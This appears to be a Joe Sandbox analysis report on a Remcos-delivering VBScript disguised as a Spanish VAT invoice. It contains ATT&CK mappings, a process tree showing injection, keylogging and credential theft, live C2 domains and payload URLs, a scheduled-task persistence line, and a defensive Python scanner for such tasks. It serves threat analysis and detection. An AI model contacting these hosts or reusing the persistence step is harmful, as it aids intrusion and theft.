                        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                        Execution: Native API (1); Exploitation for Client Execution (1); Command and Scripting Interpreter (2); Service Execution (2); PowerShell (2); Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                        Persistence: Scripting (421); DLL Side-Loading (1); Windows Service (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                        Privilege Escalation: DLL Side-Loading (1); Bypass User Account Control (1); Access Token Manipulation (1); Windows Service (1); Process Injection (222); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                        Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Bypass User Account Control (1); Masquerading (1); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (222); HTML Smuggling; Dynamic API Resolution
                        Credential Access: OS Credential Dumping (1); Input Capture (211); Credentials In Files (2); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                        Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); File and Directory Discovery (3); System Information Discovery (33); Security Software Discovery (21); Virtualization/Sandbox Evasion (31); Process Discovery (3); Application Window Discovery (1); System Owner/User Discovery (1)
                        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                        Collection: Archive Collected Data (11); Input Capture (211); Clipboard Data (3); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                        Command and Control: Ingress Tool Transfer (12); Encrypted Channel (21); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                        Impact: System Shutdown/Reboot (1); Defacement (1); Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
                        Behavior Graph ID: 1578245 | Sample: LbtytfWpvx.vbs | Start date: 19/12/2024 | Architecture: WINDOWS | Score: 100
                        Graph-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 16 other signatures
                        Contacted hosts at graph level: set.officialswrc.top; rem.pushswroller.eu; 10 other IPs or domains
                        Process tree (node numbers as in the graph):
                          2 Start -> 9 wscript.exe, 12 wscript.exe
                          9 wscript.exe: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures -> 14 powershell.exe
                          12 wscript.exe -> 18 powershell.exe
                          14 powershell.exe: set.officialswrc.top (5.182.211.158, ports 443, 49737, 49755, SKB-ENTERPRISENL Netherlands); Writes to foreign memory regions; Injects a PE file into a foreign processes -> 20 MSBuild.exe, 23 MSBuild.exe, 27 cmd.exe, 29 conhost.exe
                          18 powershell.exe -> 31 MSBuild.exe, 33 conhost.exe, 35 MSBuild.exe
                          20 MSBuild.exe: Contains functionality to bypass UAC (CMSTPLUA); Contains functionalty to change the wallpaper; Contains functionality to steal Chrome passwords or cookies; 3 other signatures
                          23 MSBuild.exe: dim.remofficialws.top (45.80.158.30, ports 23101, 49739, 49741, UK2NET-ASGB Netherlands); geoplugin.net (178.237.33.50, ports 49740, 80, ATOM86-ASATOM86NL Netherlands); dropped C:\Users\user\AppData\Local\Temp\ajul.vbs (data); dropped C:\ProgramData\remcos\logs.dat (data); Installs a global keyboard hook -> 37 wscript.exe
                          27 cmd.exe: dropped C:\ProgramData\talpe.vbs (Unicode); Potential malicious VBS script found (suspicious strings); Command shell drops VBS files -> 39 conhost.exe

                        Source | Detection | Scanner | Label | Link
                        LbtytfWpvx.vbs | 5% | ReversingLabs | Win32.Trojan.Generic |
                        LbtytfWpvx.vbs | 5% | Virustotal | | Browse
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        Source | Detection | Scanner | Label | Link
                        https://set.officialswrc.top/ink/gre.txt | 0% | Avira URL Cloud | safe |
                        http://set.officialswrc.top | 0% | Avira URL Cloud | safe |
                        dim.remofficialws.top | 0% | Avira URL Cloud | safe |
                        rem.officialswvrem.top | 0% | Avira URL Cloud | safe |
                        https://set.officialswrc.top | 0% | Avira URL Cloud | safe |
                        rem.pushswroller.eu | 100% | Avira URL Cloud | malware |
                        firewarzone.ydns.eu | 100% | Avira URL Cloud | malware |
                        Name | IP | Active | Malicious | Antivirus Detection | Reputation
                        bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
                        firewarzone.ydns.eu | 45.80.158.30 | true | true | | unknown
                        set.officialswrc.top | 5.182.211.158 | true | true | | unknown
                        rem.pushswroller.eu | 45.80.158.30 | true | true | | unknown
                        geoplugin.net | 178.237.33.50 | true | false | | high
                        s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
                        rem.officialswvrem.top | 45.80.158.30 | true | true | | unknown
                        fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | high
                        dim.remofficialws.top | 45.80.158.30 | true | true | | unknown
                        res.cloudinary.com | unknown | unknown | false | | high
                        Name | Malicious | Antivirus Detection | Reputation
                        https://set.officialswrc.top/ink/gre.txt | true | Avira URL Cloud: safe | unknown
                        http://geoplugin.net/json.gp | false | | high
                        firewarzone.ydns.eu | true | Avira URL Cloud: malware | unknown
                        rem.pushswroller.eu | true | Avira URL Cloud: malware | unknown
                        rem.officialswvrem.top | true | Avira URL Cloud: safe | unknown
                        dim.remofficialws.top | true | Avira URL Cloud: safe | unknown
                        Name | Source | Malicious | Antivirus Detection | Reputation
                        https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gte | wscript.exe, 00000000.00000002.1703716071.0000022E108A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.1977583212.00000266DEA59000.00000004.00000020.00020000.00000000.sdmp | false | | high
                        https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnoc// | wscript.exe, 00000008.00000002.1977583212.00000266DEA7B000.00000004.00000020.00020000.00000000.sdmp | false | | high
                        http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.2026099087.000001CB43782000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.2026099087.000001CB43782000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbsbitC | wscript.exe, 00000000.00000003.1699236695.0000022E127B1000.00000004.00000020.00020000.00000000.sdmp | false | | high
                        https://res.cloudinary.com/dzvai8 | wscript.exe, wscript.exe, 00000008.00000002.1978037118.00000266E0885000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1975830431.00000266E0884000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.1977981910.00000266E0880000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1975290595.00000266E0882000.00000004.00000020.00020000.00000000.sdmp | false | | high
                        https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gmeC | wscript.exe, 00000000.00000002.1703716071.0000022E108A8000.00000004.00000020.00020000.00000000.sdmp | false | | high
                        https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg | powershell.exe, 00000009.00000002.2351710903.0000025E9C781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2351710903.0000025E9C9A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://set.officialswrc.top | powershell.exe, 00000001.00000002.2002003466.000001CB00E94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2002003466.000001CB00EF3000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                        https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.2026099087.000001CB43782000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        https://set.officialswrc.top | powershell.exe, 00000001.00000002.2002003466.000001CB00E94000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                        https://github.com/koswald/VBScript/blob/master/SetupPerUser.md | wscript.exe, 00000000.00000003.1702805355.0000022E128B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702649965.0000022E10936000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702365849.0000022E108DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1703228032.0000022E129B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698585874.0000022E127D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.1959638902.00000176D8A20000.00000004.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1973340251.00000266DEA8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1973834135.00000266DEAE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1974006639.00000266E0981000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1974579887.00000266E0A81000.00000004.00000020.00020000.00000000.sdmp, LbtytfWpvx.vbs, talpe.vbs.6.dr | false |
                                                                  high
                                                                  https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocv4wscript.exe, 00000008.00000003.1973920441.00000266DEA7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gmehwscript.exe, 00000008.00000002.1977583212.00000266DEA59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://res.cloudinary.compowershell.exe, 00000001.00000002.2026099087.000001CB43782000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2351710903.0000025E9C9A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocwscript.exe, 00000000.00000003.1702704778.0000022E108CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://geoplugin.net/json.gp/CMSBuild.exe, 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbswscript.exe, 00000008.00000003.1974579887.00000266E0A81000.00000004.00000020.00020000.00000000.sdmp, LbtytfWpvx.vbs, talpe.vbs.6.drfalse
                                                                              high
                                                                              https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aawscript.exe, 00000000.00000002.1703853983.0000022E1098E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702472569.0000022E1098A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702503863.0000022E1098D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702365849.0000022E108DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1974450182.00000266DEB3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1973340251.00000266DEA8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1973834135.00000266DEAE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.1977779291.00000266DEB3E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1974417448.00000266DEB3B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1974240401.00000266DEB38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aC=5wscript.exe, 00000008.00000002.1977694405.00000266DEADA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1973340251.00000266DEA8F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://aka.ms/pscore68powershell.exe, 00000001.00000002.2026099087.000001CB43561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2351710903.0000025E9C781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://github.com/koswald/VBScripttalpe.vbs.6.drfalse
                                                                                      high
                                                                                      https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnowscript.exe, 00000000.00000003.1702704778.0000022E108CE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1703772168.0000022E108CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1973920441.00000266DEA7A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.1977583212.00000266DEA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2026099087.000001CB43561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2351710903.0000025E9C781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410alwscript.exe, 00000000.00000003.1702365849.0000022E108DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1703826317.0000022E10929000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1703033281.0000022E10929000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnoc0wscript.exe, 00000000.00000002.1703772168.0000022E108CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
IP             Domain                Country      ASN    ASN Name            Malicious
45.80.158.30   firewarzone.ydns.eu   Netherlands  13213  UK2NET-ASGB         true
178.237.33.50  geoplugin.net         Netherlands  8455   ATOM86-ASATOM86NL   false
5.182.211.158  set.officialswrc.top  Netherlands  64425  SKB-ENTERPRISENL    true

geoplugin.net is not flagged because it is a public geolocation API, but the string http://geoplugin.net/json.gp was recovered from MSBuild.exe memory (URL list above) and the same endpoint recurs across the Remcos samples in the context tables below. A request to geoplugin.net/json.gp from MSBuild.exe is therefore a useful detection signal even though the domain itself is not an indicator to block.
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578245
Start date and time: 2024-12-19 13:18:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 16s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: LbtytfWpvx.vbs (renamed because the original name is a hash value)
Original Sample Name: 4dd53bc42716f9abe36ae85c8ca8ea4b_m_Factura de IVA,pdf.vbs
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winVBS@21/10@7/3
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 52
• Number of non-executed functions: 189
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 104.17.202.1, 104.17.201.1, 20.12.23.50, 199.232.210.172, 52.165.164.15, 192.229.221.95, 20.242.39.171, 20.109.210.53, 13.107.246.63
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, resc.cloudinary.com.cdn.cloudflare.net, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Execution Graph export aborted for target MSBuild.exe, PID 6800 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
07:19:05  API Interceptor  154x Sleep call for process: powershell.exe modified
07:20:39  API Interceptor  446918x Sleep call for process: MSBuild.exe modified
12:19:30  Task Scheduler   Run new task: TaskName path: wscript.exe s>C:\ProgramData\talpe.vbs
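The Task Scheduler entry above is the persistence step: a new task launches wscript.exe on C:\ProgramData\talpe.vbs, a script dropped into a directory any standard user can write to. The Python below is an added example written for this report; it is not Joe Sandbox code and not code from the sample. It parses scheduled-task definitions in the XML format Windows stores under C:\Windows\System32\Tasks and flags Exec actions that run a script host (or a script file directly) out of a user-writable location. The task definitions embedded in it are constructed to mirror the finding above, and the lists of script hosts, writable prefixes and script extensions are assumed hunting heuristics, not something the report states.

```python
"""Flag scheduled tasks that run a script host on a script in a user-writable path.

Added example for this report (not Joe Sandbox code, not code from the sample).
Windows keeps one XML definition per task under C:\\Windows\\System32\\Tasks; the
definitions below are constructed to mirror the report's finding (wscript.exe on
C:\\ProgramData\\talpe.vbs) and are not files taken from the sandbox.
"""
import os
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Assumed heuristics, not values from the report: interpreters that commonly front a
# dropped script, directories a standard user can write to, and script extensions
# that Windows launches through a file association even without an explicit host.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "pwsh.exe"}
WRITABLE_PREFIXES = ("c:\\programdata", "c:\\users\\", "c:\\windows\\temp",
                     "%programdata%", "%appdata%", "%localappdata%", "%temp%", "%public%")
SCRIPT_EXT_RE = re.compile(r"\.(vbs|vbe|js|jse|wsf|hta|ps1|bat|cmd)\b")
_XML_DECL = re.compile(r"^\s*<\?xml[^>]*\?>")


def _image_name(command):
    """Last path component of the Exec Command, ignoring quotes and either slash style."""
    return re.split(r"[\\/]", command.strip().strip('"'))[-1].lower()


def _parse_task(xml_data):
    """Accept raw bytes from the task store (UTF-16 with BOM) or an already decoded str."""
    if isinstance(xml_data, bytes):
        return ET.fromstring(xml_data)
    # expat rejects a str that still declares a multi-byte encoding, so drop the declaration.
    return ET.fromstring(_XML_DECL.sub("", xml_data, count=1))


def inspect_task_xml(xml_data, task_name="<unnamed>"):
    """Return one finding per Exec action that launches a script from a user-writable directory."""
    findings = []
    for exec_node in _parse_task(xml_data).findall(".//t:Actions/t:Exec", NS):
        command = exec_node.findtext("t:Command", default="", namespaces=NS)
        arguments = exec_node.findtext("t:Arguments", default="", namespaces=NS)
        # Either field may carry the script: "wscript.exe C:\...\x.vbs" or just "C:\...\x.js".
        launch = f"{command} {arguments}".lower()
        runs_script = _image_name(command) in SCRIPT_HOSTS or bool(SCRIPT_EXT_RE.search(launch))
        in_writable = any(prefix in launch for prefix in WRITABLE_PREFIXES)
        if runs_script and in_writable:
            findings.append({"task": task_name, "command": command.strip(),
                             "arguments": arguments.strip()})
    return findings


def scan_task_dir(task_dir="C:\\Windows\\System32\\Tasks"):
    """Walk a live task store (needs Administrator); unreadable or non-XML entries are skipped."""
    hits = []
    for dirpath, _, files in os.walk(task_dir):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    hits.extend(inspect_task_xml(fh.read(), os.path.relpath(path, task_dir)))
            except (OSError, ET.ParseError):
                continue
    return hits


# Constructed definition mirroring the report's Task Scheduler entry (not a sandbox artifact).
SAMPLE_TASK_XML = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>wscript.exe</Command>
      <Arguments>C:\\ProgramData\\talpe.vbs</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed control: same script host, but the script lives under System32, so no finding.
BENIGN_TASK_XML = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Windows\\System32\\wscript.exe</Command>
      <Arguments>//B C:\\Windows\\System32\\maintenance.vbs</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for hit in inspect_task_xml(SAMPLE_TASK_XML, "constructed-sample"):
        print(f"{hit['task']}: {hit['command']} {hit['arguments']}")
    if os.name == "nt":
        for hit in scan_task_dir():
            print(f"{hit['task']}: {hit['command']} {hit['arguments']}")
```

The directory scanner hands the parser raw bytes on purpose: the files in the task store start with a UTF-16 byte order mark, which expat handles directly, whereas a decoded string that still declares encoding="UTF-16" is rejected. Treat a hit as a lead rather than a verdict and pair it with the task's registration time and author before acting on it.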
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 45.80.158.30
• 173261064444feee4c05378d5cb0bdc1a536ff9f623e28d93246c641e622bd865a85d1a223699.dat-decoded.exe | malicious | Snake Keylogger, VIP Keylogger | context: sws.swpushroller.eu/swsk/P4.php
• Doc261124.vbs | malicious | Snake Keylogger, VIP Keylogger | context: sws.swpushroller.eu/swsk/P4.php
Match: 178.237.33.50
• SEPTobn3BR.exe | malicious | Remcos, DBatLoader | context: geoplugin.net/json.gp
• greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta | malicious | Cobalt Strike, Remcos, DBatLoader | context: geoplugin.net/json.gp
• RFQ NO 65-58003.exe | malicious | Remcos | context: geoplugin.net/json.gp
• SwiftCopy_PaymtRecpt121228.exe | malicious | Remcos | context: geoplugin.net/json.gp
• BBVA S.A..vbs | malicious | Remcos | context: geoplugin.net/json.gp
• Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe | malicious | Remcos, GuLoader | context: geoplugin.net/json.gp
• Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | malicious | Remcos, GuLoader | context: geoplugin.net/json.gp
• Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe | malicious | Remcos, GuLoader | context: geoplugin.net/json.gp
• givenbestupdatedoingformebestthingswithgreatnewsformegive.hta | malicious | Cobalt Strike, Remcos | context: geoplugin.net/json.gp
• clearentirethingwithbestnoticetheeverythinggooodfrome.hta | malicious | Cobalt Strike, Remcos | context: geoplugin.net/json.gp
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: rem.pushswroller.eu
• BBVA S.A..vbs | malicious | Remcos | context: 45.80.158.30
• 173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exe | malicious | Remcos | context: 45.80.158.30
• Aktarma,pdf.vbs | malicious | Remcos | context: 45.80.158.30
Match: bg.microsoft.map.fastly.net
• YinLHGpoX4.vbs | malicious | GuLoader, RHADAMANTHYS | context: 199.232.214.172
• gCXzb0K8Ci.ps1 | malicious | Unknown | context: 199.232.210.172
• H2PspQWoHE.ps1 | malicious | Unknown | context: 199.232.214.172
• H6epOhxoPY.ps1 | malicious | Unknown | context: 199.232.210.172
• KcKtHBkskI.ps1 | malicious | Unknown | context: 199.232.214.172
• 1M1QoJF40r.ps1 | malicious | Unknown | context: 199.232.210.172
• StGx54oFh6.exe | malicious | Quasar | context: 199.232.214.172
• 8iAcoQLc3o.ps1 | malicious | Unknown | context: 199.232.214.172
• R7FBVcp1tf.ps1 | malicious | Unknown | context: 199.232.210.172
• 2rTi9MgX25.ps1 | malicious | Unknown | context: 199.232.210.172
Match: s-part-0035.t-0009.t-msedge.net
• H2PspQWoHE.ps1 | malicious | Unknown | context: 13.107.246.63
• https://nicholaspackaging.businesslawcloud.com/mTlFM | malicious | HTMLPhisher | context: 13.107.246.63
• https:/u8138501.ct.sendgrid.net/ls/click?upn=u001.I6qT8Dz69MhteW3705K6IU1LQ3g963Y3zRTsxDX4fVXYJ9RlDTttUZ-2F4W6jkAN-2BWeLmhXvVM33dZ8zdyDBxMHQ-3D-3D9QvK_A3EA-2BxZf4c3dsLaDejTByFLk41BCxE4Uo2OrX4mgE2MxlzcgK-2B0xybGuUTGyYJ5YjbiPC-2BiCJh5GAJwBubqkrvcCxWB69FtxO-2BVNGA0rN43JH8wByhnP3sbd4cxwRxIrAIlntQArpxTPdsHXXK7UbcIv5pqpXW-2FKGrctJVKLD8TvnmRv0E5Rim-2FIGs5oxbnurWR3Goko7UqMeLf2edTdmQ-3D-3D | malicious | Unknown | context: 13.107.246.63
• BJtvb5Vdhh.exe | malicious | Quasar | context: 13.107.246.63
• https://e.trustifi.com/#/fff2a1/305619/6dc30e/bb62bb/581844/11c063/a3c1ce/c0ba4d/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/838c7e/cd63d6/82c9fe/baf706/264690/9188a6/a54400/a45112/68deb9/a1d612/148c70/62dcf5/9cb4f7/9713c0/de2350/884a31/c8623a/2f5546/ab6255/63291e/390e78/6b371c/add804/d4bbed/01f0b4/6023ca/9b7c0b/b0881b/bd8fbb/380790/942e2d/c30675/2c79c4/594b5b/fa5dac/c17e29/ec9861/3d4f90/8d1dd9/15a5f1/e3d291/035383/58ff7f/dcf654/c36a6d/ac2219/0a7478/f49f04/50db6b/1c0640/509cd9/d5eb23/7e01e4/b5bcef/2cfb1e/1cd263/f68c45/7325e0/8e5d9b/dacf2c/074706/a0f040/11bf65/f8b4f7/b49b4f/da74f6/285aa9/b249dd/d9b9c7/1a738e/07e7fa/7ea43f/a69f97/422641/436e51/504e86 | malicious | HTMLPhisher | context: 13.107.246.63
• http://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=N_pyUL0QJkeR_KiXHZsVlyTB1Qoy7S9IkE8Ogzl8coFUQlZDVFpDUkpSUUhUQzVRN0Q2MFNLQU1XTy4u | malicious | HTMLPhisher | context: 13.107.246.63
• contract_signed.pdf | malicious | Unknown | context: 13.107.246.63
• whacipher.exe | malicious | Unknown | context: 13.107.246.63
• s3hvuz3XS0.exe | malicious | Cryptbot | context: 13.107.246.63
• 661fW9gxDp.exe | malicious | LummaC | context: 13.107.246.63
Match: geoplugin.net
• SEPTobn3BR.exe | malicious | Remcos, DBatLoader | context: 178.237.33.50
• greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta | malicious | Cobalt Strike, Remcos, DBatLoader | context: 178.237.33.50
• RFQ NO 65-58003.exe | malicious | Remcos | context: 178.237.33.50
• SwiftCopy_PaymtRecpt121228.exe | malicious | Remcos | context: 178.237.33.50
• BBVA S.A..vbs | malicious | Remcos | context: 178.237.33.50
• Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe | malicious | Remcos, GuLoader | context: 178.237.33.50
• Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | malicious | Remcos, GuLoader | context: 178.237.33.50
• Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe | malicious | Remcos, GuLoader | context: 178.237.33.50
• givenbestupdatedoingformebestthingswithgreatnewsformegive.hta | malicious | Cobalt Strike, Remcos | context: 178.237.33.50
• clearentirethingwithbestnoticetheeverythinggooodfrome.hta | malicious | Cobalt Strike, Remcos | context: 178.237.33.50
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              ATOM86-ASATOM86NLSEPTobn3BR.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                              • 178.237.33.50
                                                                                              greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                                                                              • 178.237.33.50
                                                                                              RFQ NO 65-58003.exeGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              SwiftCopy_PaymtRecpt121228.exeGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                              • 178.237.33.50
                                                                                              Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                              • 178.237.33.50
                                                                                              Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                              • 178.237.33.50
